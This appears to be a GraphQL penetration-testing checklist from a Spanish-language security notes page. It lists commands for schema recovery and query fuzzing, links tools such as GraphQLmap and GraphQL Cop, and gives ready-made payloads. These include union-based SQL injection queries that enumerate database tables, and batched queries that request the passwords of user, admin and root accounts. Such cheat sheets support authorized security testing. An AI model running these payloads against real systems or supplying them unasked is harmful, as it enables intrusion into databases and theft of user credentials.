GraphQL
Checklist
# GraphQL suggestions
clairvoyance -H "<header>: <value>" -c 1 -x "http://127.0.0.1:8080" --no-ssl -w <wordlist> -o schema.json http://<target>/graphql --progress
# Fuzzing queries
ffuf -u http://<target>/graphql -w <wordlist.txt>:FUZZ -X POST -d "{\"query\":\"query {FUZZ}\"}" -H "Authorization: Bearer <token>" -H "Content-Type: application/json" -c -mc all -fr "Cannot query" -o ffuf-fuzzing-graphql-queries.html -of html
# Union-based SQLi
{"query": "{user(username: \"x' UNION SELECT 1,2,3,4-- -\"){id,name,password}}"}
## MySQL / MariaDB
{"query": "{user(username: \"x' UNION SELECT 1,2,GROUP_CONCAT(table_name),4,5,6 FROM information_schema.tables WHERE table_schema=database()-- -\"){id,name,password}}"}
# JSON list based batching
[
{"query":"{user(username: \"user\") {id,name,password}}"},
{"query":"{user(username: \"admin\") {id,name,password}}"},
{"query":"{user(username: \"root\") {id,name,password}}"}
]
# Query name based batching
{"query":"{
first: user(username:\"user\"){id,name,password}
second: user(username:\"admin\") {id,name,password}
third: user(username:\"root\") {id,name,password}
}"}
Herramientas
Clairvoyance
clairvoyance -H "<header>: <value>" -c <concurrent-requests> -x "http://127.0.0.1:8080" --no-ssl -w <wordlist> -o schema.json http://<target>/graphql --progress
graphw00f
main.py -d -f -t <target>
GraphQL Cop
graphql-cop.py -t <target>/graphql
GraphQLmap
graphqlmap.py -u <target>/graphql
InQL
GraphQL Voyager
Altair GraphQL Client
Wordlists
Última actualización
¿Te fue útil?